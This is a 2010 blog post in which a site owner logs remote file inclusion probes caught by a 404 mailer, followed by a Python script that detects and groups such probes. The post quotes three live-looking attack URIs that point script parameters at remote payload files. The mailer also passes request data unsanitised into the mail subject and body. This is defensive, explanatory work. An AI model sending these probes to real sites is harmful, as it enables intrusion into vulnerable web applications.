Thursday, February 4, 2010

Examples of ongoing web site injection attacks I am experiencing

I'm no security professional. When it comes to security, my eyes glaze over and I feel lost. But to get a better feel for the broken links at my sites, I recently edited my .htaccess file to include this line:

ErrorDocument 404 /404.php


Then I put this line into my 404.php:

<?php // 404.php: mail me each missed request with its referrer and the client address
mail('me@myserver.com', "$_SERVER[REQUEST_URI] file not found at mysite.com", "Referred by: $_SERVER[HTTP_REFERER]\nREMOTE_ADDR: $_SERVER[REMOTE_ADDR]"); ?>


What followed from there was a startling procession of mails showing me repeated waves of php injection and hijacking attacks. I intend to log interesting samples here:

2010 February 4


/main.php?page=http://qqe.ru/forum/Smileys/id1.txt?
This is apparently a URL sent at random in the hope that I have a main.php file that will accept this remote page, display it, and do more mischief. I wager this is a signature vulnerability of some popular web software package.

//phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://www.inmonservicios.com//id1.txt???
I do have phpGedView installed at my site. This is apparently an attempt to take advantage of the PHP setting register_globals=on to set the phpGedView internal base directory variable to a remote site, then do some sort of command-line and file mischief with PHP scripts at that remote site. This is probably a known vulnerability with some phpGedView set-ups. register_globals has long been recommended to be off, not on, due to this type of vulnerability. register_globals being on lets HTTP GET and POST variables be registered as regular PHP global variables, which obviously can wreak havoc with the workings of your scripts. See wikibooks for a better explanation.

2010 February 11


//errors.php?error=http://www.cienciacompartida.org////id1.txt???
This one is guessing I have an errors.php file that will do something fun with the URL they are providing.
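All three probes above share one shape: a query parameter whose value is a URL on someone else's server, in the hope that the script will include it. As an added example (not part of the original post), here is a small Python script that applies that check to the request URIs a 404 mailer like the one above would collect. The sample list is constructed: the first three entries are the probes quoted in this post, the rest are benign or placeholder lines added for illustration (example.invalid is not a real host).

```python
import re
from urllib.parse import parse_qsl

# Constructed sample of REQUEST_URI values as they would arrive in the 404 mails.
# The first three are the probes quoted in the post; the rest are made up here.
SAMPLE_URIS = [
    "/main.php?page=http://qqe.ru/forum/Smileys/id1.txt?",
    "//phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://www.inmonservicios.com//id1.txt???",
    "//errors.php?error=http://www.cienciacompartida.org////id1.txt???",
    "/gallery/photos.php?page=2",                                   # benign: numeric page
    "/old-article.html",                                            # benign: no query at all
    "/index.php?inc=http%3A%2F%2Fexample.invalid%2Fid1.txt",        # constructed, percent-encoded
]

# A value that starts with a URL scheme and a host is what every probe above has in common.
REMOTE_RE = re.compile(r"^(?:https?|ftp)://([^/?#]+)", re.IGNORECASE)


def find_rfi_probe(request_uri):
    """Return (parameter, remote_host) for the first query value that is a remote URL, else None.

    The query is cut at the first '?' by hand rather than with urlsplit, because a
    URI that begins with '//' (as two of the logged probes do) would otherwise be
    read as having a network location. parse_qsl percent-decodes values, so an
    encoded 'http%3A%2F%2F' is caught the same way as a plain 'http://'.
    """
    _, _, query = request_uri.partition("?")
    for name, value in parse_qsl(query, keep_blank_values=True):
        match = REMOTE_RE.match(value.strip())
        if match:
            return name, match.group(1).lower()
    return None


def summarize(uris):
    """Group flagged requests by the remote host they point at, listing the parameters abused.

    This is the view that makes the 'waves' visible: one host showing up across
    many different parameter names is one scanner trying every guess it knows.
    """
    by_host = {}
    for uri in uris:
        found = find_rfi_probe(uri)
        if found:
            param, host = found
            by_host.setdefault(host, []).append(param)
    return by_host


if __name__ == "__main__":
    for host, params in summarize(SAMPLE_URIS).items():
        print(f"{host}: {', '.join(params)}")
```

Feeding the script the subject lines of the 404 mails (one REQUEST_URI per line) gives the same per-host grouping for a real log.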
